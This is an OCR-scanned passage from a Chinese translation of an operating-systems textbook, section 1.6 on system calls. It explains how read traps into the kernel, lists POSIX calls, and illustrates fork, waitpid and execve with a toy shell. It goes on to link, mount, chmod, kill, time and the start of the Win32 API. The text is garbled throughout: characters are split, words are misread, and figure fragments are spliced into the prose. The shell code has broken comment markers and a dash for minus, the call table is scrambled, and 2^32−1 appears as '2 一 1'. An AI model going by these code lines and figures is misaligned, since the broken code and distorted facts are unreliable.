一 个 可 以 做 到 这 点 的 系统 。 最 终 ， 这 个 思想 传播 到 所 有 的 机 型 上 ， 现 在 广泛 用 于 多 数 UNIX 和 Windows 
系统 中 。 

在 所 有 这 些 发 展 过 程 中 ， 我 们 看 到 ， 在 一 种 环境 中 出 现 的 思想 ， 随 着 环境 的 变化 被 抛弃 (汇编 语言 
设计 、 单 道 程序 处 理 、 单 层 目录 等 )， 通 常 在 十 年 之 后 ， 该 思想 在 另 一 种 环境 下 又 重 现 了 。 由 于 这 个 原 
因 ， 本 书 中 ， 我 们 将 不 时 回顾 那些 在 今日 的 吉 字 节 PC 中 过 时 的 思想 和 算法 ， 因 为 这 些 思想 和 算法 可 能 会 
在 嵌入 式 计算 机 和 智能 卡 中 再 现 。 


1.6 系统 调用 

我 们 已 经 看 到 操作 系统 具有 两 种 功能 : 为 用 户 程序 提供 抽象 和 管理 计算 机 资源 。 在 多 数 情形 下 ， 用 
户 程序 和 操作 系统 之 间 的 交互 处 理 的 是 前 者 ， 例 如 ， 创 建 、 写 入 、 读 出 和 删除 文件 。 对 用 户 而 言 ， 资 源 
管理 部 分 主要 是 透明 和 自动 完成 的 。 这 样 ， 用 户 程 序 和 操作 系统 之 间 的 交互 主要 就 是 处 理 抽象 。 为 了 真 
正 理解 操作 系统 的 行为 ， 我 们 必须 仔细 地 分 析 这 个 接口 。 接 口中 所 提供 的 调用 随 着 操作 系统 的 不 同 而 变 
化 (尽管 基于 的 概念 是 类 似 的 )。 

这 样 我 们 不 得 不 在 如 下 的 可 能 方式 中 进行 选择 : (1) 含混 不 清 的 一 般 性 叙述 (“操作 系统 提供 读 取 
文件 的 系统 调用 ”) ，(2) 某 个 特定 的 系统 “UNIX 提供 一 个 有 三 个 参数 的 read 系 统 调用 : 一 个 参数 指 
定 文件 ， 一 个 说 明 数 据 应 存放 的 位 置 ， 另 一 个 说 明 应 读 出 多 少 字 节 ”)。 

我 们 选择 后 一 种 方式 。 这 种 方式 需要 更 多 的 努力 ， 但 是 它 能 更 多 地 洞察 操作 系统 具体 在 做 什么 。 尽 
管 这 样 的 讨论 会 涉及 专门 的 POSIX (International Standard 9945-1) ， 以 及 UNIX、System V, BSD, 
Linux, MINIX 3 等 , 但 是 多 数 现代 操作 系统 都 有 实现 相同 功能 的 系统 调用 , 尽管 它们 在 细节 上 差别 很 大 。 
由 于 引发 系统 调用 的 实际 机 制 是 非常 依赖 于 机 器 的 ， 而 且 必 须 用 汇编 代码 表达 ， 所 以 ， 通 过 提供 过 程 库 
使 C 程 序 中 能 够 使 用 系统 调用 ， 当 然 也 包括 其 他 语言 。 

记 住 下 列 事项 是 有 益 的 。 任 何 单 CPU 计 算 机 一 次 只 能 执行 一 条 指令 。 如 果 一 个 进程 正在 用 户 态 运行 
一 个 用 户 程序 ， 并 且 需 要 一 个 系统 服务 ， 比 如 从 一 个 文件 读数 据 ， 那 么 它 就 必须 执行 一 个 陷阱 或 系统 调 
用 指令 ， 将 控制 转移 到 操作 系统 。 操 作 系 统 接着 通过 参数 检查 找 出 所 需要 的 调用 进程 。 然 后 ， 它 执行 系 
统 调用 ， 并 把 控制 返回 给 在 系统 调用 后 面 跟随 着 的 指令 。 在 某 种 意义 上 ， 进 行 系统 调用 就 像 进 行 一 个 特 
殊 的 过 程 调用 ,但 是 只 有 系统 调用 可 以 进入 内 核 ， 而 过 程 调用 则 不 能 。 

为 了 使 系统 调用 机 制 更 清晰 ， 我 们 简要 地 考察 read 系 统 调用 。 如 上 所 述 ， 它 有 三 个 参数 : 第 一 个 参数 
指定 文件 ， 第 二 个 指向 缓冲 区 ， 第 三 个 说 明 要 读 出 的 字 节 数 。 几 乎 与 所 有 的 系统 调用 一 样 ， 它 的 调用 由 C 
程序 完成 ， 方 法 是 调用 一 个 与 该 系统 调用 名 称 相同 的 库 过 程 : read。 由 C 程 序 进行 的 调用 形式 如 下 : 


count = read(fd, buffer, nbytes); 


系统 调用 (以 及 库 过 程 ) 在 count 中 返回 实际 读 出 的 字 节 数 。 这 个 值 通常 和 nbytes 相 同 ， 但 也 可 能 更 小 ， 
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例如 ， 如 果 在 读 过 程 中 遇 到 了 文件 尾 的 情形 就 是 如 此 。 

如 果 系 统 调用 不 能 执行 ， 不 论 是 因为 无 效 的 参数 还 是 磁盘 错误 ，count 都 会 被 置 为 -1， 而 在 全 局 变 
量 errno 中 放 入 错误 号 。 程 序 应 该 经 常 检 查 系统 调用 的 结果 ， 以 了 解 是 否 出 错 。 

系统 调用 是 通过 一 系列 的 步 又 实现 的 。 为 了 更 清楚 地 说 明 这 个 概念 ， 考 察 上 面 的 read 调 用 。 在 准备 
调用 这 个 实际 用 来 进行 read 系 统 调用 的 read 库 过 程 时 ， 调 用 程序 首先 把 参数 压 进 堆栈 ， 如 图 1-17 中 步 
又 1 一 步骤 3 所 示 。 


地 址 
OxFFFFFFFF 


返回 到 调用 者 
把 用 于 read 的 代码 放 在 寄存 器 中 
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人 
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内 核 空间 
(操作 系统 ) 





图 1-17 完成 系统 调用 read(fd, buffer, nbytes) 的 11 个 步骤 


由 于 历史 的 原因 ，C 以 及 C++ 编译 器 使 用 逆序 (必须 把 第 一 个 参数 赋 给 printf (格式 字符 串 )， 放 在 
堆栈 的 顶部 )。 第 一 个 和 第 三 个 参数 是 值 调用 ,但 是 第 二 个 参数 通过 引用 传递 ， 即 传递 的 是 缓冲 区 的 地 
址 (由 及 指示 )， 而 不 是 缓冲 区 的 内 容 。 接 着 是 对 库 过 程 的 实际 调用 (第 4 步 )。 这 个 指令 是 用 来 调用 所 
有 过 程 的 正常 过 程 调用 指令 。 

在 可 能 是 由 汇编 语言 写成 的 库 过 程 中 ,一般 把 系统 调用 的 编号 放 在 操作 系统 所 期 望 的 地 方 ， 如 寄存 
器 中 (第 5 步 )。 然 后 执行 一 个 TRAP 指 令 ， 将 用 户 态 切 换 到 内 核 态 ， 并 在 内 核 中 的 一 个 固定 地 址 开始 执 
行 (第 6 步 )。TRAP 指 令 实 际 上 与 过 程 调用 指令 非 党 类似， 它们 后 面 都 跟随 一 个 来 自 远 处 位 置 的 指令 ， 
以 及 供 以 后 使 用 的 一 个 保存 在 栈 中 的 返回 地 址 。 

然而 ，TRAP 指 令 与 过 程 指令 存在 两 个 方面 的 差别 。 首 先 ， 它 的 副作用 是 ， 切 换 到 内 核 态 。 而 过 程 
调用 指令 并 不 改变 模式 。 其 次 ， 不 像 给 定 过 程 所 在 的 相对 或 绝对 地 址 那样 ，TRAP 指 令 不 能 跳 转 到 任意 
地 址 上 。 根 据 机 器 的 体系 结构 ， 或 者 跳 转 到 一 个 单 固定 地 址 上 ， 或 者 指令 中 有 一 8 位 长 的 字段 ， 它 给 定 
了 内 存 中 一 张 表格 的 索引 ， 这 张 表格 中 含有 跳 转 地 址 。 

跟随 在 TRAP 指 令 后 的 内 核 代码 开始 检查 系统 调用 编号 ， 然 后 分 派 给 正确 的 系统 调用 处 理 器 ， 这 通常 
是 通过 一 张 由 系统 调用 编号 所 引用 的 、 指 向 系统 调用 处 理 器 的 指针 表 来 完成 (第 7 步 )。 此 时 ， 系 统 调用 
处 理 器 运行 (第 8 步 )。 一 旦 系统 调用 处 理 器 完成 其 工作 ， 控 制 可 能 会 在 跟随 TRAP 指 令 后 面 的 指令 中 返回 
给 用 户 空间 库 过 程 (第 9 步 )。 这 个 过 程 接着 以 通常 的 过 程 调用 返回 的 方式 ， 返回 到 用 户 程序 (第 10 步 )。 

为 了 完成 整个 工作 ， 用 户 程 序 还 必须 清除 堆栈 ， 如 同 它 在 进行 任何 过 程 调用 之 后 一 样 (第 11 步 )。 
假设 堆栈 向 下 增长 ， 如 经 常 所 做 的 那样 ， 编 译 后 的 代码 准确 地 增加 堆栈 指针 值 ， 以 便 清除 调用 read 之 前 
压 入 的 参数 。 在 这 之 后 ， 原 来 的 程序 就 可 以 随意 执行 了 。 
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在 前 面 第 9 步 中 ,我们 提 到 “控制 可 能 会 在 跟随 TRAP 指 令 后 面 的 指令 中 返回 给 用 户 空间 库 过 程 ”， 
这 是 有 原因 的 。 系 统 调 用 可 能 堵塞 调用 者 ， 避 免 它 继续 执行 。 例 如 ， 如 果 试 图 读 键盘 ， 但 是 并 没有 任何 
键入 ， 那 么 调用 者 就 必须 被 阻塞 。 在 这 种 情形 下 ， 操 作 系统 会 查看 是 否 有 其 他 可 以 运行 的 进程 。 稍 后 ， 
当 需 要 的 输入 出 现时 ， 进 程 会 提醒 系统 注意 ， 然 后 步骤 9 一 步骤 11 会 接着 进行 。 

下 面 几 小 节 中 ， 我 们 将 考察 一 些 常用 的 POSIX 系 统 调 用 ， 或 者 用 更 专业 的 说 法 ， 考 察 进 行 这 些 系统 
调用 的 库 过 程 。POSIX 大 约 有 100 个 过 程 调用 ， 它 们 中 最 重要 的 过 程 调用 列 在 图 1-18 中 。 为 方便 起 见 ， 
它们 被 分 成 4 类 。 我 们 用 文字 简要 地 叙述 其 作用 。 



































进程 管理 
说 明 
pid = fork() 创建 与 父 进程 相同 的 子 进程 
pid = waitpid(pid, &statloc,options) 等 待 一 个 子 进程 终止 
s = execve(name, argv, environp) 替换 一 个 进程 的 核心 映像 
exit(status) 终止 进程 执行 并 返回 状态 





文件 管理 








说 OA 
打开 一 个 文件 供 读 、 写 或 两 者 
关闭 一 个 打开 的 文件 

把 数据 从 一 个 文件 读 到 缓冲 区 中 
把 数据 从 缓冲 区 写 到 一 个 文件 中 
移动 文件 指针 


取得 文件 的 状态 信息 


目录 和 文件 系统 管理 





















fd = open(file, how, ...) 








s = close(fd) 

n = read(fd, buffer, nbytes) 
n = write(fd, buffer, nbytes) 
position = lseek(fd, offset, whence) 

















s = stat(name, &buf) 





调 用 


s= mkdir(name, mode) 











s = rmdir(name) 





s = link(name1, name2) 





s = unlink(name) 








s = mount(special, name, flag) 















s = umount(special) 印 载 一 个 文件 系统 





x 项 








s = chdir(dirname) 改变 工作 目录 





s = chmod(name, mode) 修改 一 个 文件 的 保护 位 





s = kill(pid, signal) 发 送信 号 给 一 个 进程 
seconds =time(&seconds) 自 1970 年 1 月 1 日 起 的 流逝 时 间 











图 1-18 一 些 重要 的 POSIX 系 统 调用 。 若 出 错 则 返回 代码 s 为 -1。 返 回 代码 如 下 : pid 是 进程 的 id，fd 是 文 
件 描述 符 ，n 是 字 节 数 ，position 是 在 文件 中 的 偏 移 量 ， 而 seconds 是 流逝 时 间 。 参 数 在 正文 中 解释 
从 广义 上 看 ， 由 这 些 调用 所 提供 的 服务 确定 了 多 数 操作 系统 应 该 具有 的 功能 ， 而 在 个 人 计算 机 上 ， 


资源 管理 功能 是 较 弱 的 (至 少 与 多 用 户 的 大 型 机 相 比 较 是 这 样 )。 所 包含 的 服务 有 创建 与 终止 进程 ， 创 
建 、 删 除 、 读 出 和 写 入 文件 ， 目 录 管 理 以 及 完成 输入 /输出 。 
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有 必要 指出 ， 将 POSIX 过 程 映射 到 系统 调用 并 不 是 一 对 一 的 。POSIX 标 准 定义 了 构造 系统 所 必须 
提供 的 一 套 过 程 ， 但 是 并 没有 规定 它们 是 系统 调用 、 库 调用 还 是 其 他 的 形式 。 如 果 不 通过 系统 调用 就 可 
以 执行 一 个 过 程 〈 即 无 须 陷 和 内核) ， 那 么 从 性 能 方面 考虑 ， 它 通常 会 在 用 户 空 间 中 完成 。 不 过 ， 多 数 
POSIX 过 程 确 实 进行 系统 调用 ， 通 常 是 一 个 过 程 直 接 映 射 到 一 个 系统 调用 上 。 在 一 些 情形 下 ， 特 别 是 所 
需要 的 过 程 仅仅 是 某 个 调用 的 变 体 时 ， 一 个 系统 调用 会 对 应 若干 个 库 调用 。 


1.6.1 用 于 进程 管理 的 系统 调用 

图 1-18 中 的 第 一 组 调用 用 于 进程 管理 。 将 有 关 fork (派生 ) 的 讨论 作为 本 节 的 开始 是 较为 合适 的 。 
在 UNIX 中 ，fork 是 唯一 可 以 在 POSIX 中 创建 进程 的 途径 。 它 创建 一 个 原 有 进程 的 精确 副本 ， 包 括 所 有 的 
文件 描述 符 、 寄 存 器 等 内 容 。 在 fork 之 后 ， 原 有 的 进程 及 其 副本 ( 父 与 子 ) 就 分 开 了 。 在 fork 时 ， 所 有 
的 变量 具有 一 样 的 值 ， 虽 然 父 进程 的 数据 被 复制 用 以 创建 子 进程 ， 但 是 其 中 一 个 的 后 续 变 化 并 不 会 影响 
到 另 一 个 。( 由 父 进程 和 子 进程 共享 的 程序 正文 ， 是 不 可 改变 的 。) fork 调 用 返回 一 个 值 ， 在 子 进 程 中 该 
值 为 零 ， 并 且 在 父 进程 中 等 于 子 进程 的 进程 标识 符 (Process IDentifier，PID )。 使 用 返回 的 PID ， 就 可 
以 在 两 个 进程 中 看 出 哪 一 个 是 父 进程 ， 哪 一 个 是 子 进 程 。 

多 数 情形 下 ， 在 fork 之 后 ， 子 进程 需要 执行 与 父 进程 不 同 的 代码 。 这 里 考虑 shell 的 情形 。 它 从 终端 
读 取 命令 ,创建 一 个 子 进程 ， 等 待 该 子 进程 执行 命令 ， 在 该 子 进程 终止 时 ， 读 入 下 一 条 命令 。 为 了 等 待 
子 进程 结束 ， 父 进程 执行 waitpid 系 统 调用 ， 它 只 是 等 待 ， 直 至 子 进程 终止 (车 有 多 个 子 进程 的 话 ， 则 直 
至 任何 一 个 子 进程 终止 )。waitpid 可 以 等 待 一 个 特定 的 子 进程 ， 或 者 通过 将 第 一 个 参数 设 为 一 1 的 方式 ， 
等 待 任何 一 个 老 的 子 进程 。 在 waitpid 完 成 之 后 ， 将 把 第 二 个 参数 statloc 所 指向 的 地 址 设置 为 子 进程 的 退 
出 状态 (正常 或 异常 终止 以 及 退出 值 )。 有 各 种 可 使 用 的 选项 ， 它 们 由 第 三 个 参数 确定 。 例 如 ， 如 果 没 
有 已 经 退出 的 子 进程 则 立即 返回 。 

现在 考虑 shell 如 何 使 用 fork。 在 键入 一 条 命令 后 ，shell 调 用 fork 创 建 一 个 新 的 进程 。 这 个 子 进程 必 
须 执行 用 户 的 命令 。 通 过 使 用 execve 系 统 调用 可 以 实现 这 一 点 ， 这 个 系统 调用 会 引起 其 整个 核心 映像 被 
一 个 文件 所 替代 ， 该 文件 由 第 一 个 参数 给 定 。( 实 际 上 ， 该 系统 调用 自身 是 exec 系 统 调用 ， 但 是 若干 个 
不 同 的 库 过 程 使 用 不 同 的 参数 和 稍 有 差别 的 名 称 调 用 该 系统 调用 。 在 这 里 , 我 们 把 它们 都 视 为 系统 调用 。) 
在 图 1-19 中 ， 用 一 个 高 度 简化 的 shell 说 明 fork、waitpid 以 及 execve 的 使 用 。 


#define TRUE 1 


while (TRUE) { # 一 直 循环 下 去 */ 


type_prompt( ); /+ 在 屏幕 上 显示 提示 符 */ 
read_command(command, parameters); /« 从 终端 读 取 输 入 +/ 


if (fork() != 0) { /* 派生 子 进程 */ 
Ie 父 代码 */ 
waitpid(—1, &status, 0); /* 等 待 子 进程 退出 */ 
} else { 
/* 子 代码 *#/ 5 
execve(command, parameters, 0); de 执行 命令 */ 
} 


} 





图 1-19 一 个 shell (在 本 书 中 ，TRUE 都 被 定义 为 1) 


在 最 一 般 情 形 下 ，execve 有 三 个 参数 : 将 要 执行 的 文件 名 称 ， 一 个 指向 变量 数组 的 指针 ， 以 及 一 
个 指向 环境 数组 的 指针 。 这 里 对 这 些 参数 做 一 个 简要 的 说 明 。 各 种 库 例 程 ， 包 括 exec1、execv、execle 
以 及 execve， 人 允许 略 掉 参数 或 以 各 种 不 同 的 方式 给 定 。 在 本 书 中 ， 我 们 在 所 有 涉及 的 地 方 使 用 exec 描 述 
系统 调用 。 

下 面 考虑 诸如 

cp file1 file2 
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的 命令 ， 该 命令 将 filel 复制 到 file2, fEshell 创建 进程 之 后 ， 该 子 进程 定位 和 执行 文件 cp， 并 将 源 文件 
名 和 目标 文件 名 传递 给 它 。 
cp 主 程序 (以 及 多 数 其 他 C 程 序 的 主 程序 ) 都 有 声明 


main(argc, argv, envp) 


其 中 argc 是 该 命令 行内 有 关 参 数 数目 的 计数 器 ， 包 括 程 序 名 称 。 例 如 ， 上 面 的 例子 中 ，argc 为 3。 

第 二 个 参数 argv 是 一 个 指向 数组 的 指针 。 该 数组 的 元 素 i 是 指向 该 命令 行 第 i 个 字符 串 的 指针 。 在 本 
例 中 ，argv[0] 指 向 字符 串 “cp”, argv[1] 指 向 字符 串 “file1”，argv[2] 指 向 字符 串 “file2”。 

main 的 第 三 个 参数 envp 是 一 个 指向 环境 的 指针 ， 该 环境 是 一 个 数组 ， 含 有 name = value 的 赋值 形式 ， 
用 以 将 诸如 终端 类 型 以 及 根 目 录 等 信息 传送 给 程序 。 还 有 供 程 序 调 用 的 库 过 程 ， 用 来 取得 环境 变量 ， 这 
些 变量 通常 用 来 确定 用 户 希望 如 何 完成 特定 的 任务 〈 例 如， 使 用 默认 打印 机 )。 在 图 1-19 中 ， 没 有 环境 
参数 传递 给 子 进程 ， 所 以 execve 的 第 三 个 参数 为 0。 

如 果 读 者 认为 exec 过 于 复杂 ， 那 么 也 不 要 失望 。 这 是 在 POSIX 的 全 地 址 (十 六 进 制 ) 
部 系统 调用 中 最 复杂 的 一 个 (语义 上 )， 其 他 的 都 非常 简单 。 作 为 一 个 PREE 
简单 例子 ， 考 虑 exit， 这 是 在 进程 完成 执行 后 应 执行 的 系统 调用 。 这 个 
系统 调用 有 一 个 参数 一 一 退出 状态 (0 至 255)， 该 参数 通过 waitpid 系 统 
调用 中 的 statloc 返 回 父 进程 。 

在 UNIX 中 的 进程 将 其 存储 空间 划分 为 三 段 : 正文 段 (如 程序 代码 )、 
数据 段 (如 变量 ) 以 及 堆栈 段 。 数 据 向 上 增长 而 堆栈 向 下 增长 ， 如 图 1- 
20 所 示 。 夹 在 中 间 的 是 未 使 用 的 地 址 空间 。 堆 栈 在 需要 时 自动 地 向 中 间 ”图 1-20 进程 有 三 段 : 正文 段 、 
扩充 后 ， 该 系统 调用 指定 一 个 新 地 址 。 但 是 ， 这 个 调用 不 是 POSIX 标 准 
中 定义 的 ， 对 于 存储 器 的 动态 分 配 ， 鼓 励 程序 员 使 用 malloc 库 过 程 ， 而 malloc 的 内 部 实现 则 不 是 一 个 适 
合 标准 化 的 主题 ， 因 为 几乎 没有 程序 员 直 接 使 用 它 ， 我 们 有 理由 怀疑 是 否 会 有 人 注意 到 brk 实 际 不 是 属 
于 POSIX 的 。 


1.6.2 用 于 文件 管理 的 系统 调用 

许多 系统 调用 与 文件 系统 有 关 。 本 小 节 讨 论 在 单个 文件 上 的 操作 ，1.6.3 节 将 讨论 与 目录 和 整个 文件 
系统 有 关 的 内 容 。 

要 读 写 一 个 文件 ， 先 要 使 用 open 打 开 该 文件 。 这 个 系统 调用 通过 绝对 路 径 名 或 指向 工作 目录 的 相 
对 路 径 名 指定 要 打开 文件 的 名 称 ， 而 代码 O RDONLY、O_WRONLY 或 O RDWR 的 含义 分 别 是 只 读 、 只 
写 或 两 者 都 可 以 。 为 了 创建 一 个 新 文件 ， 使 用 O_CREAT 参 数 。 然 后 可 使 用 返回 的 文件 描述 符 进 行 读 写 
操作 。 接 着 ， 可 以 用 close 关 闭 文件 ， 这 个 调用 使 得 该 文件 描述 符 在 后 续 的 open 中 被 再 次 使 用 。 

毫 无 疑问 ， 最 常用 的 调用 是 read 和 write。 我 们 在 前 面 已 经 讨论 过 read。write 具 有 与 read 相 同 的 参数 。 

尽管 多 数 程序 频繁 地 读 写 文件 ， 但 是 仍 有 一 些 应 用 程序 需要 能 够 随机 访问 一 个 文件 的 任意 部 分 。 与 
每 个 文件 相关 的 是 一 个 指向 文件 当前 位 置 的 指针 。 在 顺序 读 ( 写 ) 时 ， 该 指针 通常 指向 要 读 出 〈 写 入 ) 
的 下 一 个 字 节 。lseek 调 用 可 以 改变 该 位 置 指针 的 值 ， 这 样 后 续 的 read 或 write 调用 就 可 以 在 文件 的 任何 
地 方 开始 。 

lseek 有 三 个 参数 : 第 一 个 是 文件 的 描述 符 ， 第 二 个 是 文件 位 置 ， 第 三 个 说 明 该 文件 位 置 是 相对 于 文 
件 起 始 位 置 、 当 前 位 置 还 是 文件 的 结尾 。 在 修改 了 指针 之 后 ，lseek 所 返回 的 值 是 文件 中 的 绝对 位 置 。 

UNIX 为 每 个 文件 保存 了 该 文件 的 类 型 (普通 文件 、 特 殊 文 件 、 目 录 等 )、 大 小 、 最 后 修改 时 间 以 及 
其 他 信息 。 程 序 可 以 通过 stat 系 统 调用 查看 这 些 信息 。 第 一 个 参数 指定 了 要 被 检查 的 文件 ， 第 二 个 参数 是 
一 个 指针 ， 该 指针 指向 存放 这 些 信息 的 结构 。 对 于 一 个 打开 的 文件 而 言 ，fstat 调 用 完成 同样 的 工作 。 


1.6.3 用 于 目录 管理 的 系统 调用 
本 小 节 我 们 讨论 与 目录 或 整个 文件 系统 有 关 的 某 些 系统 调用 ， 而 不 是 1.6.2 节 中 与 一 个 特定 文件 有 关 
的 系统 调用 。mkdir 和 rmdir 分 别 用 于 创建 和 删除 空 目录 。 下 一 个 调用 是 link。 它 的 作用 是 允许 同一 个 文 
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件 以 两 个 或 多 个 名 称 出 现 ， 多 数 情 形 下 是 在 不 同 的 目录 中 这 样 做 。 它 的 典型 应 用 是 ， 在 同一 个 开发 团队 
中 允许 若干 个 成 员 共享 一 个 共同 的 文件 ， 他 们 每 个 人 都 在 自己 的 目录 中 有 该 文件 ， 但 可 能 采用 的 是 不 同 
的 名 称 。 共 享 一 个 文件 ， 与 每 个 团队 成 员 都 有 一 个 私 用 副本 并 不 是 同一 件 事 ， 因 为 共享 文件 意味 着 任何 
成 员 所 做 的 修改 都 立即 为 其 他 成 员 所 见 一 一 只 有 一 个 文件 存在 。 而 在 复制 了 一 个 文件 的 多 个 副本 之 后 ， 
对 其 中 一 个 副本 所 进行 的 修改 并 不 会 影响 到 其 他 的 副本 。 

为 了 考察 link 是 如 何 工 作 的 ， 考 虑 图 1-21a 中 的 情形 。 有 两 个 用 户 ast 和 jim， 每 个 用 户 都 有 一 些 文件 
的 目录 。 若 ast 现 在 执行 一 个 含有 系统 调用 的 程序 


link("/usr/jim/memo","usr/ast/note"); 


jim 目 录 中 的 文件 memo 以 文件 名 note 进 入 ast 的 目录 。 之 后 ，/usr/jim/memo 和 /usr/ast/note 都 引用 相同 的 文件 。 
顺便 提 及 ， 用 户 是 将 目录 保存 在 /usr、/user、/home 还 是 其 他 地 方 ， 完 全 取决 于 本 地 系统 管理 员 。 

理解 link 是 如 何 工作 的 也 许 有 助 于 读者 看 清 其 作用 。 在 UNIX 中 ， 每 个 文件 都 有 唯一 的 编号 ， 即 i- 编 
号 ， 用 以 标识 文件 。 该 i- 编 号 是 对 i- 节 点 表格 的 一 个 引用 ， 它 们 一 一 对 应 ， 说 明 该 文件 的 拥有 者 、 磁 盘 
块 的 位 置 等 。 目 录 就 是 一 个 包含 了 (i- 编 号 ，ASCII 名 称 ) 对 集合 的 文件 。 在 UNIX 的 第 一 个 版 本 中 ， 每 
个 目录 项 有 16 字 节 一 一 2 字 节 用 于 i- 编 号 ，14 字 节 用 于 名 称 。 现 在 为 了 支持 长 文件 名 ， 采 用 了 更 复杂 的 结 
构 ， 但 是 ， 在 概念 上 ， 目 录 仍 然 是 〈i- 编 号 ，ASCII 名 称 ) 对 的 一 个 集合 。 在 图 1-21 中 ，mail 为 i- 编 号 16， 
等 等 。link 所 做 的 只 是 利用 某 个 已 有 文件 的 i- 编 号 ， 创 建 一 个 新 目录 项 (也许 用 一 个 新 名 称 )。 在 图 1-21b 
中 两 个 目录 项 有 相同 的 i- 编 号 (70)， 从 而 指向 同一 个 文件 。 如 果 使 用 unlink 系 统 调用 将 其 中 一 个 文件 移 
走 了 ， 可 以 保留 另 一 个 。 如 果 两 个 都 被 移 走 了 ，UNIX 00 看 到 尚且 存在 的 文件 没有 目录 项 (i- 节 点 中 的 
一 个 域 记 录 着 指向 该 文件 的 目录 项 ) ， 就 会 把 该 文件 从 磁盘 中 移 去 。 


/ust/ast /usr/jim /usr/ast /usr/jim 





a) b) 


1-21 a) 将 /usr/jim/memo 链 接 到 ast 目 录 之 前 的 两 个 目录 ; b) 链接 之 后 的 两 个 目录 


正如 我 们 已 经 叙述 过 的 ，mount 系 统 调用 允许 将 两 个 文件 系统 合并 成 为 一 个 。 通 常 的 情形 是 ， 在 硬 
盘 某 个 分 区 中 的 根 文件 系统 含有 常用 命令 的 二 进 制 (可 执行 ) 版 和 其 他 常用 的 文件 ; 用户 文件 在 另 一 个 
分 区 。 并 且 ， 用 户 可 插入 包含 需要 读 入 的 文件 的 U 盘 。 

通过 执行 mount 系 统 调 用 ， 可 以 将 一 个 USB 文 件 系 统 添加 到 根 文件 系统 中 ， 如 图 1-22 所 示 。 完 成 安 
装 操作 的 典型 C 语 句 为 

mount("/dev/sdb0","/mnt",0); 
这 里 ， 第 一 个 参数 是 USB 驱 动 器 0 的 块 特殊 文件 名 称 ， 第 二 个 参数 是 要 被 安装 在 树 中 的 位 置 ， 第 三 个 参 
数 说 明 将 要 安装 的 文件 系统 是 可 读 写 的 还 是 只 读 的 。 


a) b) 


图 1-22 a) 安装 前 的 文件 系统 ，b) 安装 后 的 文件 系统 
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在 mount 调 用 之 后 ， 驱 动 器 0 上 的 文件 可 以 使 用 从 根 目录 开 始 的 路 径 或 工作 目录 路 径 ， 而 不 用 考虑 
文件 在 哪个 驱动 器 上 。 事 实 上 ， 第 二 个 、 第 三 个 以 及 第 四 个 驱动 器 也 可 安装 在 树 上 的 任何 地 方 。mount 
调用 使 得 把 可 移动 介质 都 集中 到 一 个 文件 层次 中 成 为 可 能 ， 而 不 用 考虑 文件 在 哪个 驱动 器 上 。 尽 管 这 是 
个 CD-ROM 的 例子 ， 但 是 也 可 以 用 同样 的 方法 安装 硬盘 或 者 硬盘 的 一 部 分 ( 常 称 为 分 区 或 次 级 设备 )， 
外 部 硬盘 和 USB 盘 也 一 样 。 当 不 再 需要 一 个 文件 系统 时 ， 可 以 用 umount 系 统 调用 印 载 之 。 


1.6.4 各 种 系统 调用 
有 各 种 的 系统 调用 。 这 里 介绍 系统 调用 中 的 一 部 分 。chdir 调 用 改变 当前 的 工作 目录 。 在 调用 


chdir("/usr/ast/test"); 


之 后 ， 打 开 xyz 文 件 ， 会 打开 /usr/ast/test/xyz。 工 作 目 录 的 概念 消除 了 总 是 键入 (长 ) 绝对 路 径 名 的 需要 。 
在 UNIX 中 ， 每 个 文件 有 一 个 保护 模式 。 该 模式 包括 针对 所 有 者 、 组 和 其 他 用 户 的 读 一 写 一 执行 位 。 

chmod 系 统 调用 可 以 改变 文件 的 模式 。 例 如 ， 要 使 一 个 文件 对 除了 所 有 者 之 外 的 用 户 只 读 ， 可 以 执行 
chmod("file",0644); 


kill 系 统 调用 供用 户 或 用 户 进程 发 送信 号 用 。 若 一 个 进程 准备 好 捕捉 一 个 特定 的 信号 ， 那 么 ， 在 信号 到 来 
时 ， 运 行 一 个 信号 处 理 程序 。 如 果 该 进程 没有 准备 好 ， 那 么 信号 的 到 来 会 杀 掉 该 进程 〈 此 调用 名 称 的 由 来 ) 。 

POSIX 定 义 了 若干 处 理 时 间 的 过 程 。 例 如 ，time 以 秒 为 单位 返回 当前 时 间 ，0 对 应 着 1970 年 1 月 1 日 
午夜 (从 此 日 开始 ， 没 有 结束 ) 。 在 一 台 32 位 字 的 计算 机 中 ，time 的 最 大 值 是 2 一 1 秒 (假设 是 无 符号 整 
数 ) 。 这 个 数字 对 应 136 年 多 一 点 。 所 以 在 2106 年 ，32 位 的 UNIX 系 统 会 发 狂 ， 与 2000 年 对 世界 计算 机 造 
成 严重 破坏 的 知名 Y2K 问 题 是 类 似 的 。 如 果 读 者 现在 有 32 位 UNIX 系 统 ， 建 议 在 2106 年 之 前 的 某 时 刻 更 
换 为 64 位 的 系统 。 


1.6.5 Windows Win32 API 

到 目前 为 止 ， 我 们 主要 讨论 的 是 UNIX 系 统 。 现 在 简要 地 考察 Windows。Windows 和 UNIX 的 主要 差 
别 在 于 编程 方式 。UNIX 程 序 包括 做 各 种 处 理 的 代码 以 及 完成 特定 服务 的 系统 调用 。 相 反 ，Windows 程 
序 通常 是 事件 驱动 程序 。 其 中 主 程序 等 待 某 些 事件 发 生 ， 然 后 调用 一 个 过 程 处 理 该 事件 。 典 型 的 事件 包 
括 被 敲 击 的 键 、 移 动 的 鼠标 、 被 按 下 的 鼠标 或 插入 的 U 盘 。 调 用 事件 处 理 程序 处 理事 件 ， 刷 新 屏幕 ， 并 
更 新 内 部 程序 状态 。 总 之 ， 这 是 与 UNIX 不 同 的 程序 设计 风格 ， 由 于 本 书 专注 于 操作 系统 的 功能 和 结构 ， 
这 些 程序 设计 方式 上 的 差异 就 不 过 多 涉及 了 。 

当然 ， 在 Windows 中 也 有 系统 调用 。 在 UNIX 中 ， 系 统 调用 (如 read) 和 系统 调用 所 使 用 的 库 过 程 
(如 read) 之 间 几 乎 是 一 一 对 应 的 关系 。 换 名 话说， 对 于 每 个 系统 调用 ， 差 不 多 就 涉及 一 个 被 调用 的 库 
过 程 ， 如 图 1-17 所 示 。 此 外 ，POSIX 有 约 100 个 过 程 调用 。 

在 Windows 中 ， 情 况 就 大 不 相同 了 。 首 先 ， 库 调用 和 实际 的 系统 调用 几乎 是 不 对 应 的 。 微 软 定义 了 
一 套 过 程 ， 称 为 Win32 应 用 编程 接口 (Application Program Interface，API) ， 程 序 员 用 这 套 过 程 获得 操 
作 系 统 的 服务 。 从 Windows 95 开 始 的 所 有 Windows 版 本 都 (或 部 分 ) 支持 这 个 接 号。 由 于 接口 与 实际 的 
